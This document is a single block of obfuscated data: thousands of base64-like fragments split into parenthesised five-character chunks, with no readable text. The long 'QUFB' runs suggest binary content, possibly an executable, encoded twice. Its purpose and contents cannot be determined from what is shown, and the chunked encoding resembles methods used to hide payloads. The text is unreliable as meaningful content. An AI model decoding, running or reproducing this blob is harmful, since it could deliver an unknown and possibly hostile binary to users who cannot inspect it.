(QUNBQ(UlBQW(dBQ0F(BZlFB(TkFBb(0FmUU(FOQUF(vQURR(QUtBR(2tBWm(dBb0F(DZ0FW(QUJsQ(UhNQW(RBQXR(BRVFB(WlFCb(UFHRU(FkUUJ(zQUhR(QVRBQ(mhBRz(RBWnd(CMUFH(RUFad(0JsQU(NrQUl(BQXRB(R1VBY(1FBZ0(FDUUF(kQUJ5(QUhVQ(VpRQW(dBQzB(BYndC(eUFDQ(UFLQU(JEQUd(nQVpR(QmpBR(3NBTF(FCVEF(IUUFZ(UUJ5Q(UhRQW(RRQnd(BRXNB(WlFCN(UFIY0(Fid0J(5QUdR(QWN3Q(XBBQ0(FBTFF(CbEFI(RUFJQ(UFrQU(hRQWN(nQjFB(R1VBS(1FBTk(FBb0F(ld0FO(QUFvQ(URRQU(tBSDB(BRFFB(S0FHV(UFiQU(J6QUd(VQURR(QUtBS(HNBRF(FBS0F(DQUFJ(QUFnQ(UNBQV(pRQjR(BR2tB(ZEFBN(0FBME(FDZ0I(5QUEw(QUNnQ(U5BQW(9BRFF(BS0FB(MEFDZ(0FOQU(FvQUR(RQUtB(Q0FBS(UFBZ0(FDQUF(JQUFn(QUNBQ(UlBQW(dBQTB(BQ2dB(a0FHS(UFOZ0(EwQUh(NQWRB(QnlBR(jhBZF(FCeUF(Hd0FJ(QUE5Q(UNBQU(lnQm9(BSFFB(ZEFCd(0FITU(FPZ0F(2QUM4(QWNnQ(mhBSG(NBTGd(CbkFH(a0FkQ(UJvQU(hVQVl(nQjFB(SE1BW(lFCeU(FHTUF(id0J1(QUhRQ(VpRQn(VBSFF(BTGdC(akFHO(EFiUU(F2QUd(NQVlR(QnZBR(zRBYV(FCdEF(HRUFN(UUF5Q(URNQU(5BQTF(BQzBB(WXdCe(UFHVU(FZUUI(wQUc4(QWNnQ(XZBRk(lBWlF(CbUFH(d0FaU(UJqQU(hRQVV(BQkZB(RWtBY(mdCcU(FHVUF(Zd0Iw(QUY4Q(WVBQT(JBRFF(BTHdC(eUFHV(UFaZ0(J6QUM(4QWFB(QmxBR(0VBWk(FCekF(DOEFi(UUJoQ(UdrQW(JnQXZ(BR0lB(TmdBM(EFITU(FkQUJ(5QUNJ(QU93Q(U5BQW(9BSkF(CMEFH(VUFjd(0IwQU(Y4QWR(RQnlB(R3dBS(UFBOU(FDQUF(JZ0Jv(QUhRQ(WRBQn(dBSE1(BT2dB(dkFDO(EFjZ0(JoQUh(jQUxn(Qm5BR(2tBZE(FCb0F(IVUFZ(Z0IxQ(UhNQV(pRQnl(BR01B(YndCd(UFIUU(FaUUJ(1QUhR(QUxnQ(mpBRz(hBYlF(BdkFH(TUFZU(UJ2QU(c0QWF(RQnRB(R0VBT(VFBeU(FETUF(OQUEx(QUMwQ(Vl3Qn(lBR1V(BWVFC(MEFHO(EFjZ0(F2QUZ(JQVpR(Qm1BR(3dBWl(FCakF(IUUFV(QUJGQ(UVrQW(JnQnF(BR1VB(WXdCM(EFGOE(FlQUE(yQURR(QUx3Q(nlBR1(VBWmd(CekFD(OEFhQ(UJsQU(dFQVp(BQnpB(QzhBY(lFCaE(FHa0F(iZ0F2(QUhRQ(VpRQn(pBSFF(BSWdB(N0FBM(EFDZ0(FrQUh(JQVpR(QnhBS(FVBWl(FCekF(IUUFJ(QUE5Q(UNBQV(d3QlR(BSGtB(Y3dCM(EFHVU(FiUUF(1QUU0(QVpRQ(jBBQz(RBU0F(CMEFI(UUFjQ(UJYQU(dVQVl(nQlNB(R1VBY(1FCMU(FHVUF(jd0Iw(QUYwQ(U9nQT(ZBRU1(BY2dC(bEFHR(UFkQU(JsQUN(nQUpB(QmlBR(FlBTk(FCekF(IUUFj(Z0JmQ(UhVQW(NnQnN(BQ2tB(T3dBT(kFBb0(FKQUJ(5QUdV(QWNRQ(jFBR1(VBY3d(CMEFD(NEFUU(UJsQU(hRQWF(BQnZB(R1FBS(UFBOU(FDQUF(JZ0JI(QUVVQ(VZBQW(lBRHN(BRFFB(S0FBM(EFDZ0(FOQUF(vQUpB(QnlBR(1VBY3(dCd0F(HOEFi(Z0J6Q(UdVQU(lBQTl(BQ0FB(SkFCe(UFHVU(FjUUI(xQUdV(QWN3Q(jBBQz(RBUnd(CbEFI(UUFVZ(0JsQU(hNQWN(BQnZB(RzRBY(3dCbE(FDZ0F(LUUE3(QUEwQ(UNnQW(tBSE1(BZEFC(eUFHV(UFZUU(J0QUN(BQVBR(QWdBQ(1FBY2(dCbEF(ITUFj(QUJ2Q(Uc0QW(N3Qmx(BQzRB(UndCb(EFIUU(FVZ0J(sQUhN(QWNBQ(nZBRz(RBY3d(CbEFG(TUFkQ(UJ5QU(dVQVl(RQnRB(Q2dBS(1FBN0(FBMEF(DZ0Fr(QUhJQ(VpRQm(hBR1F(BWlFC(eUFDQ(UFQUU(FnQUU(0QVpR(QjNBQ(zBBVH(dCaUF(Hb0Fa(UUJqQ(UhRQU(lBQlR(BSGtB(Y3dCM(EFHVU(FiUUF(1QUVr(QVR3Q(XVBRk(1BZEF(CeUFH(VUFZU(UJ0QU(ZJQVp(RQmhB(R1FBW(lFCeU(FDZ0F(KQUJ6(QUhRQ(WNnQm(xBR0V(BYlFB(cEFEc(0FEUU(FLQUN(RQVln(QmhBS(E1BWl(FBMkF(EUUFV(d0IwQ(UhJQW(FRQnV(BR2NB(SUFBO(UFDQU(FKQUJ(5QUdV(QVlRQ(mtBR1(VBY2d(BdUFG(SUFaU(UJoQU(dRQVZ(BQnZB(RVVBY(mdCa0(FDZ0F(LUUE3(QUEwQ(UNnQU(5BQW9(BRFFB(S0FDU(UFjZ0(JsQUd(FQVpB(QmxBS(ElBTG(dCREF(Hd0Fi(d0J6Q(UdVQU(tBQXB(BRHNB(RFFBS(0FDUU(Fjd0I(wQUhJ(QVpRQ(mhBRz(BBTGd(CREFH(d0Fid(0J6QU(dVQUt(BQXBB(RHNBR(FFBS0(FDUUF(jZ0Js(QUhNQ(WNBQn(ZBRzR(BY3dC(bEFDN(EFRd0(JzQUc(4QWN3(QmxBQ(2dBS1(FBN0F(BMEFD(Z0FOQ(UFvQU(RRQUt(BQ1FB(WkFCc(0FHd0(FYd0J(pQUhr(QWRBQ(mxBSE(1BSUF(BOUFD(QUFXd(0JUQU(hrQWN(3QjBB(R1VBY(lFBdU(FFTUF(id0J1(QUhZQ(VpRQn(lBSFF(BWFFB(NkFEb(0FSZ0(J5QUc(4QWJR(QkNBR(0VBY3(dCbEF(EWUFO(QUJUQ(UhRQW(NnQnB(BRzRB(WndBb(0FDUU(FZZ0J(oQUhN(QVpRQ(TJBRF(FBVXd(CMEFI(SUFhU(UJ1QU(djQUt(RQTdB(QTBBQ(2dBTk(FBb0F(EUUFL(QUNRQ(WNnQm(xBSEV(BZFFC(bEFIT(UFkQU(FnQUQ(wQUlB(QmJBR(k1BZV(FCekF(IUUFa(UUJ0Q(UM0QV(RnQmx(BSFFB(TGdCS(UFIUU(FkQUJ(3QUZj(QVpRQ(mlBRk(lBWlF(CeEFI(VUFaU(UJ6QU(hRQVh(RQTZB(RG9BU(XdCeU(FHVUF(ZUUIw(QUdVQ(UtBQW(tBSFF(BWlFC(ekFIU(UFYd0(IxQUh(JQWJB(QXBBR(HNBRF(FBS0F(DUUFj(Z0JsQ(UhFQW(RRQmx(BSE1B(ZEFBd(UFFME(FaUUI(wQUdn(QWJ3Q(mtBQ0(FBUFF(BZ0FD(SUFSd(0JGQU(ZRQUl(nQTdB(QTBBQ(2dBZ0(FBMEF(DZ0FO(QUFvQ(UpBQn(lBR1V(BY3dC(d0FHO(EFiZ0(J6QUd(VQUlB(QTlBQ(0FBSk(FCeUF(HVUFj(UUIxQ(UdVQW(N3QjB(BQzRB(UndCb(EFIUU(FVZ0J(sQUhN(QWNBQ(nZBRz(RBY3d(CbEFD(Z0FLU(UE3QU(EwQUN(nQWtB(SE1BZ(EFCeU(FHVUF(ZUUJ0(QUNBQ(VBRQW(dBQ1F(BY2dC(bEFIT(UFjQU(J2QUc(0QWN3(QmxBQ(zRBUn(dCbEF(IUUFV(Z0JsQ(UhNQW(NBQnZ(BRzRB(Y3dCb(EFGTU(FkQUJ(5QUdV(QVlRQ(nRBQ2(dBS1F(BN0FB(MEFDZ(0FrQU(hJQVp(RQmhB(R1FBW(lFCeU(FDQUF(QUUFn(QUU0Q(VpRQj(NBQzB(BVHdC(aUFHb(0FaUU(JqQUh(RQUlB(QlRBS(GtBY3(dCMEF(HVUFi(UUF1Q(UVrQV(R3QXV(BRk1B(ZEFCe(UFHVU(FZUUJ(0QUZJ(QVpRQ(mhBR1(FBWlF(CeUFD(Z0FKQ(UJ6QU(hRQWN(nQmxB(R0VBY(lFBcE(FEc0F(EUUFL(QUNRQ(VlnQm(hBSE1(BWlFB(MkFEU(UFVd0(IwQUh(JQWFR(QnVBR(2NBSU(FBOUF(DQUFK(QUJ5Q(UdVQV(lRQmt(BR1VB(Y2dBd(UFGSU(FaUUJ(oQUdR(QVZBQ(nZBRV(VBYmd(Ca0FD(Z0FLU(UE3QU(EwQUN(nQWtB(R0lBW(VFCek(FHVUF(OZ0Ew(QUZNQ(WRBQn(lBR2t(BYmdC(bkFDQ(UFQUU(FnQUN(RQVln(QmhBS(E1BWl(FBMkF(EUUFV(d0IwQ(UhJQW(FRQnV(BR2NB(TGdCV(EFIVU(FZZ0J(6QUhR(QWNnQ(nBBRz(RBWnd(Bb0FE(RUFLU(UFOQU(FvQUR(RQUtB(Q1FBY(2dCbE(FHRUF(aQUJs(QUhJQ(UxnQk(RBR3d(BYndC(ekFHV(UFLQU(FwQUR(zQURR(QUtBQ(1FBY3(dCMEF(ISUFa(UUJoQ(UcwQU(xnQkR(BR3dB(YndCe(kFHVU(FLQUF(wQURz(QURRQ(UtBQ1(FBY2d(CbEFI(TUFjQ(UJ2QU(c0QWN(3QmxB(QzRBU(XdCc0(FHOEF(jd0Js(QUNnQ(UtRQT(dBQTB(BQ2dB(TkFBb(0FKQU(IwQUd(VQWN3(QjBBR(jhBWW(dCNUF(IUUFa(UUJ6Q(UNBQV(BRQWd(BRnNB(VXdCN(UFITU(FkQUJ(sQUcw(QUxnQ(kRBRz(hBYmd(CMkFH(VUFjZ(0IwQU(YwQU9(nQTZB(RVlBY(2dCdk(FHMEF(RZ0Jo(QUhNQ(VpRQT(JBRFF(BVXdC(MEFIS(UFhUU(J1QUd(jQUtB(QWtBR(0lBWV(FCekF(HVUFO(Z0EwQ(UZNQW(RBQnl(BR2tB(YmdCb(kFDa0(FPd0F(OQUFv(QURRQ(UtBRn(NBVXd(CNUFI(TUFkQ(UJsQU(cwQUx(nQlNB(R1VBW(mdCc0(FHVUF(Zd0Iw(QUdrQ(WJ3Qn(VBQzR(BUVFC(ekFIT(UFaUU(J0QUd(JQWJB(QjVBR(jBBT2(dBNkF(Fd0Fi(d0JoQ(UdRQU(tBQWt(BR1FB(YkFCc(0FGOE(FZZ0I(1QUhR(QVpRQ(npBQ2(tBT3d(BTkFB(b0FKQ(UJ1QU(c4QWR(BQmxB(SEFBW(VFCa0(FGOEF(jQUJ5(QUc4Q(Vl3Qm(xBSE1(BY3dB(Z0FEM(EFJQU(J6QUh(RQVlR(QnlBS(FFBTF(FCd0F(ISUFi(d0JqQ(UdVQW(N3Qnp(BQ0FB(YmdCd(kFIUU(FaUUJ(3QUdF(QVpBQ(WdBQz(BBVnd(CcEFH(NEFaQ(UJ2QU(hjQVV(3QjBB(SGtBY(kFCbE(FDQUF(TQUJw(QUdRQ(VpBQm(xBRzR(BSUFB(Z0FDM(EFVQU(JoQUh(NQWN3(QlVBR(2dBY2(dCMUF(BMEFD(Z0FOQ(UFvQV(d3Qk5(BSElB(WHdCU(0FHOE(FZZ0J(2QUhR(QUxnQ(nZBRz(RBWlF(CekFH(Z0Fid(0IwQU(YwQU9(nQTZB(RklBW(lFCbU(FHd0F(aUUJq(QUhRQ(VVBQk(ZBRWt(BYmdC(cUFHV(UFZd0(IwQUd(rQWJ3(QnVBQ(2dBSk(FCMEF(HVUFj(d0IwQ(UY4QV(lnQjV(BSFFB(WlFCe(kFDd0(FJZ0F(pQUNr(QU93Q(UJnUT(lEQUR(vQVhB(QlhBR(2tBYm(dCa0F(HOEFk(d0J6Q(UZ3QV(RRQnB(BR01B(Y2dCd(kFITU(Fid0J(tQUhR(QUxnQ(k9BR1(VBZEF(CY0FH(RUFjd(0J6QU(dVQWJ(RQmlB(R3dBZ(VFCY0(FFY0F(RUUJE(QUY4Q(VRRQl(RBRWt(BVEFC(Y0FGT(UFlUU(J6QUh(RQVpR(QnRBQ(zRBVF(FCaEF(HNEFZ(UUJuQ(UdVQW(JRQmx(BRzRB(ZEFBd(UFFRU(FkUUI(wQUc4(QWJRQ(mhBSF(FBYVF(CdkFH(NEFYQ(UIyQU(RRQUx(nQXdB(RjhBT(XdBdU(FEQUF(MZ0F3(QUM0Q(U1BQm(ZBRjh(BTXdB(eEFHS(UFaZ0(F6QUR(nQU5R(QTJBR(0VBWk(FBekF(EWUFO(QUJsQ(URNQU(5RQmN(BRk1B(ZVFCe(kFIUU(FaUUJ(0QUM0(QVRRQ(mhBRz(RBWVF(CbkFH(VUFiU(UJsQU(c0QWR(BQXVB(RUVBZ(FFCME(FHOEF(iUUJo(QUhRQ(WFRQn(ZBRzR(BTGdC(a0FHd(0FiQU(FBRHd(0Nmox(N0dsd(kpkb0(ZKOWp(3SXdB(VTlUQ(UhrQW(N3QjB(BR1VB(YlFBd(UFFME(FZUUJ(1QUdF(QVp3Q(mxBRz(BBWlF(CdUFI(UUFMZ(0JCQU(hVQWR(BQnZB(RzBBW(VFCME(FHa0F(id0J1(QUM0Q(VVBQn(ZBSGN(BWlFC(eUFGT(UFhQU(JsQUd(3QWJB(QUFKU(3BuZm(1Jd1V(pQUFV(QUJ2Q(UhjQV(pRQnl(BRk1B(YUFCb(EFHd0(FiQUF(nQUh0(OGkxY(0NNQU(VqVUF(CdkFI(Y0FaU(UJ5QU(ZNQWF(BQmxB(R3dBY(kFBZ0(FIdDh(pMWZ5(WGJlR(DFsTU(NNQUV(OUXdC(eUFHV(UFZUU(IwQUd(VQUFC(MHFaM(zVpTU(ZJZ0F(FTUFj(Z0JsQ(UdFQW(RBQmx(BQ0FB(dVdYV(mJBSX(dBU05(RQUc4(QWR3Q(mxBSE(lBVXd(Cb0FH(VUFiQ(UJzQU(NBQW5(sdUxU(L0pkR(zFMNl(hnSXd(BUk5C(QUdRQ(VpBQl(RBR01(BY2dC(cEFIQ(UFkQU(FBSzM(xVTVF(N3lYZ(nR0b0(ZJd1V(pQUFV(QUJ2Q(UhjQV(pRQnl(BRk1B(YUFCb(EFHd0(FiQUF(nQUo1(YmkwO(ENNQU(VsS21(kK1lq(QlNJQ(UJCQU(dRQVp(BQkRB(RzhBY(lFCdE(FHRUF(iZ0Jr(QUNBQ(XVXWF(ZiQUl(3QVEx(SkFHN(EFkZ0(J2QUd(zQVpR(QUFJe(XBuZm(1Jd1V(naFVB(cENFZ(GlBQV(NRQnV(BSFlB(YndCc(kFHVU(FJQUM(1WmRW(c0FqQ(UJHMG(tBYmd(CMkFH(OEFhd(0JsQU(NBQXV(XWFZi(UEpkQ(TR3b2(RRSXd(BUlhU(ZnB4b(kRVNH(ZadTl(UbW1j(K1Rud(DhpMW(NDTUF(FVCts(R3dje(UZxeW(53NVU(wMlJB(bDg0W(GhyL0(FRdlJ(VeDkx(QWw4N(Fhoci(9BUUF(BQU8x(ZHVwS(2JZU1(pCaEd(ROXU4(VGxPW(mNBQk(NBQkF(RZ0RJ(QUFCQ(lNBQk(FSRVJ(CQ0FC(QVE0R(UlBRU(JBZ1V(nQVFF(UlNSd(0hEZz(RTVlJ(KWkhC(SlpFb(GtTWF(IwU1d(RZ1NX(UkpoR(W1VU2(FSSnR(CUUFC(RW5FT(0JBQU(JBUTR(GSUFF(U1ZRN(EhBQU(lDRWx(VU1ZR(UUdIU(kpWRU(NBRkV(sa09F(WGtTZ(lIwU1(ZSMFJ(nSUVI(QUFJQ(0Vsa1(NXUVl(nQWh3(Y0hSd(0hBQU(VTVlJ(HQWpR(Z2dBa(EpaRG(gwU1Z(RY2dB(UjBTV(1JGNU(F5QUF(EZ1VB(QWdJT(0RnWW(dBQjB(TZ0pV(RUlBQ(VNZUU(1nQUJ(3RUFB(RUJIQ(U1nQU(FJRkF(BSU9E(ZzRJd(DNwY1(ZoazA(0SWtD(QmdnR(kFBRU(JIUTR(JQVFB(SUFBQ(UFBQU(FlQVF(BQkFG(UUNGb(GR5WV(hCT2I(yNUZl(R05sY(0hScG(IyNVV(hSEp2(ZDNNQ(kNBRU(FBZ0F(BQUFB(QUZBR(UFEMF(Y0WVc(xd2JH(VkJjM(05sYl(dKc2V(RQUFL(UUVBS(kVWNF(lXMXd(iR1Vn(UVhOe(lpXMW(liSGt(nWm05(eUlFU(nZkRT(VsZEZ(SdlNs(Tmpjb(Wx3ZE(FBQUJ(RRUFB(QUFBS(kFFQU(gwTnZ(jSGx5(YVdkb(2RDRE(NxU0J(LWVcx(bGN5Q(kdiM0(p6YUd(GM0lE(SXdNV(GNBQU(NrQkF(DUTFO(alU1T(0dZeF(l5MDJ(aRGc0(TFRRN(U9UUX(RZVE0(1TWkx(aFpqT(XpOMk(ZpWlR(VM056(Y0FBQ(XdCQU(FjeEx(qQXVN(QzR3Q(UFCTk(FRQWN(MazVG(VkVae(VlXMW(xkMjl(5YXl4(V1pYS(nphVz(l1UFh(ZMExq(Y3VNZ(0VBVk(E0VVJ(uSmhi(V1YzY(jNKcl(JHbHp(jR3ho(ZVU1a(GJXVV(VMazV(GVkNC(R2NtR(nRaWG(R2Y21(zZ05D(NDNMa(klFQV(FBQUF(DWUJB(QUlBQ(UFBQ0(FGUUN(EVUZz(Ykc5M(1RYVn(NkR2x(3YkdV(QVZBS(UpTVz(VvWlh(KcGRH(VmtBQ(WdCQU(FzQUF(BQUFB(QUFBQ(UFCUT(VTRm5(BQUFB(QUFJQ(UFBQW(NBUUF(BRkVn(QUFCU(XFBQU(JTVTB(SVDJY(dVo4Z(0xkOF(VXbHF(Hck9u(RS8xb(lFFQU(FBQkV(PbHh6(Y21OY(1JHOT(BUbVY(wVkc5(S1UyT(nlhWE(IwTFc(xaGMz(Umxjb(HhFYj(NST1p(YUlVi(MHBUW(TNKcG(NIUXR(iV0Z6(ZEdWe(VhFVj(RZVzF(3YkdW(QmMzT(mxiV0(pzZVZ(4dllt(cGNVb(VZzWl(dGelp(WeHVi(M0J2Z(DJWeW(MyaGx(iR3d1(Y0dSa(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(GaEpB(QUFBQ(UFBQU(FBQUF(BSEpK(QUFBQ(UlBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UJrU1(FBQUF(BQUFB(QUFBQ(UFBQU(FGOUR(iM0pG(ZUdWT(llXbH(VBRzF(6WTI5(eVpXV(XVaR3(hzQUF(BQUFB(RC9KU(UFnUU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FJQUV(BQUFB(Q0FBQ(UlBWU(FBQUF(VQUFB(Z0FBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBUU(FCQUF(BQU9B(QUFnQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FRQUF(BQUFB(Z0FBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQVF(BQkFB(QUFhQ(UFBZ0(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BUUFB(QUFBQ(U9BUU(FBSkJ(nQUFD(b0F3Q(UFBQU(FBQUF(BQUFB(Q29Be(lFBQU(FCV0F(GTUFY(d0JXQ(UVVQV(VnQlR(BRWtB(VHdCT(0FGOE(FTUUJ(PQUVZ(QVR3Q(UFBQU(FBdlF(Udi9n(QUFBU(UFBQU(FFQUF(BQUFB(QUFBQ(VFBQU(FBQUF(Qd0FB(QUFBQ(UFBQU(VBQUF(BQVFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBR(VFBQU(FBQkF(GWUFZ(UUJ5Q(UVZQW(FRQnN(BR1VB(U1FCd(UFHWU(Fid0F(BQUFB(QUpBQ(UVBQU(FBVkF(CeUFH(RUFiZ(0J6QU(d3QVl(RQjBB(R2tBY(ndCdU(FBQUF(BQUFB(QUxBR(UNBTU(FBQUV(BVXdC(MEFIS(UFhUU(J1QUd(jQVJn(QnBBR(3dBWl(FCSkF(HNEFa(Z0J2Q(UFBQT(VBSUF(BQUVB(TUFBd(0FEQU(FNQUF(3QURR(QVlnQ(XdBQU(FBWWd(BbEFB(RUFRd(0J2QU(cwQWJ(RQmxB(RzRBZ(EFCek(FBQUF(SUUI0(QUdFQ(WJRQn(dBR3d(BWlFB(Z0FFR(UFjd0(J6QUd(VQWJR(QmlBR(3dBZV(FBZ0F(HWUFi(d0J5Q(UNBQV(JBQnZ(BSFFB(VGdCb(EFIUU(FWQUJ(2QUVv(QVV3Q(mpBSE(lBYVF(Cd0FI(UUFBQ(UFBQU(NJQUF(RQUJB(RU1BY(ndCdE(FIQUF(ZUUJ1(QUhrQ(VRnQm(hBRzB(BWlFB(QUFBQ(UFBQU(FBQUV(nQUVB(QUJBR(VlBYV(FCc0F(HVUFS(QUJsQ(UhNQV(l3Qnl(BR2tB(Y0FCM(EFHa0(Fid0J(1QUFB(QUFBQ(kZBSG(dBWVF(CdEFI(QUFiQ(UJsQU(VFQWN(3QnpB(R1VBY(lFCaU(FHd0F(lUUFB(QURBQ(UNBQU(JBRVl(BYVFC(c0FHV(UFWZ0(JsQUh(JQWN3(QnBBR(zhBYm(dBQUF(BQUFN(UUF1Q(URBQU(xnQXd(BQzRB(TUFBQ(UFFSU(FFUUF(CQUVr(QWJnQ(jBBR1(VBY2d(CdUFH(RUFiQ(UJPQU(dFQWJ(RQmxB(QUFBY(mdCdk(FIQUF(id0Iz(QUdVQ(WNnQn(pBR2d(BWlFC(c0FHd(0FMZ0(JsQUh(nQVpR(QUFBQ(UFBWW(dBZkF(BRUFU(QUJsQ(UdjQV(lRQnN(BRU1B(YndCd(0FIa0(FjZ0J(wQUdj(QWFBQ(jBBQU(FBUXd(CdkFI(QUFlU(UJ5QU(drQVp(3Qm9B(SFFBS(UFDcE(FDQUF(TZ0Jo(QUcwQ(VpRQn(pBQ0F(BUmdC(dkFIS(UFjd0(JvQUd(FQWR3(QWdBR(ElBTU(FBeEF(EY0FB(QUFBQ(UNvQU(FRQUJ(BRXdB(WlFCb(kFHRU(FiQUJ(VQUhJ(QVlRQ(mtBR1(VBYlF(CaEFI(SUFhd(0J6QU(FBQUF(BQUFB(QUFBU(2dBUk(FBRUF(Ud0J5(QUdrQ(Vp3Qn(BBRzR(BWVFC(c0FFW(UFhUU(JzQUd(VQWJn(QmhBR(zBBWl(FBQUF(HNEFi(d0J3Q(Uc4QW(R3Qmx(BSElB(Y3dCb(0FHVU(FiQUJ(zQUM0(QVpRQ(jRBR1(VBQUF(BQUFF(QUFFQ(UFCQU(ZBQWN(nQnZB(R1FBZ(FFCak(FIUUF(UZ0Jo(QUcwQ(VpRQU(FBQUF(BUlFC(NEFHR(UFiUU(J3QUd(3QVpR(QkJBS(E1BY3(dCbEF(HMEFZ(Z0JzQ(UhrQU(FBQTB(BQWdB(QVFCU(UFISU(Fid0J(rQUhV(QVl3Q(jBBRl(lBWlF(CeUFI(TUFhU(UJ2QU(c0QUF(BQXhB(QzRBT(UFBdU(FEQUF(MZ0F3(QUFBQ(U9BQU(lBQUV(BUVFC(ekFIT(UFaUU(J0QUd(JQWJB(QjVBQ(0FBVm(dCbEF(ISUFj(d0JwQ(Uc4QW(JnQUF(BREVB(TGdBd(0FDNE(FNQUF(1QURB(QUFBQ(klaQU(FBNmd(FQUFB(QUFBQ(UFBQU(FBQTc(3dS9Q(RDk0Y(ld3Z2(RtVnl(jMmx2(Ymowa(U1TNH(dJaUJ(sYm1O(dlpHb(HVaej(BpVlZ(SR0xU(Z2lJS(E4wWV(c1a1l(XeHZi(bVU5S(W5sbG(N5SS9(QZzBL(RFFvO(FlYTn(paVzF(pYkhr(Z2VHM(XNibk(05SW5(WeWJq(cHpZM(mhsYl(dGekx(XMXBZ(M0p2Y(zI5bW(RDMWp(iMjA2(WVhOd(ExuWX(hJaUJ(0WVc1(cFptV(npkRl(psY25(OcGIy(NDlJa(kV1TU(NJK0R(Rb2dJ(RHhoY(zNObG(JXSnN(lVWxr(Wlc1M(GFYUj(VJSFp(sY25O(cGIyN(DlJak(V1TUM(0d0xq(QWlJR(zVoYl(dVOUl(rMTVR(WEJ3Y(kdsal(lYUnB(iMjR1(WVhCd(0lpOC(tEUW9(nSUR4(MGNuV(npkRW(x1Wm0(4Z2VH(MXNib(k05SW(5WeWJ(qcHpZ(MmhsY(ldGek(xXMXB(ZM0p2(YzI5b(WRDMW(piMjA(2WVhO(dExuW(XlJaj(ROQ2l(BZ0lD(QThjM(lZqZF(hKcGR(IaytE(UW9nS(UNBZ0(lDQTh(jbVZ4(ZFdWe(mRHVm(tVSEp(wZG1s(c1pXZ(GxjeU(I0Yld(4dWN6(MGlkW(Ep1T2(5OamF(HVnRZ(WE10Y(ldsam(NtOXp(iMlow(TFdOd(mJUcG(hjMjB(1ZGpN(aVBnM(EtJQ0(FnSUN(BZ0lD(QThjb(VZ4ZF(dWemR(HVmtS(WGhsW(TNWMG(FXOXV(UR1Yy(Wld3Z(2JHVj(JaV3c(5SW1G(elNXN(TJiMn(RsY2l(JZ2RX(bEJZM(k5sYz(NNOUl(tWmhi(SE5sS(Wk4K0(RRb2d(JQ0Fn(SUNBO(EwzSm(xjWFZ(sYzNS(bFpGQ(nlhWF(pwYkd(WblpY(TStEU(W9nSU(NBZ1B(DOXpa(V04xY(21sMG(VUNE5(DaUFn(UEM5M(GNuVn(pkRWx(1Wm04(K0RRb(zhMMk(Z6YzJ(WdFlt(eDVQZ(0FBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFCQU(FBQU1(BQUFB(aERrQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF(BQUFB(QUFBQ(UFBQU(FBQUF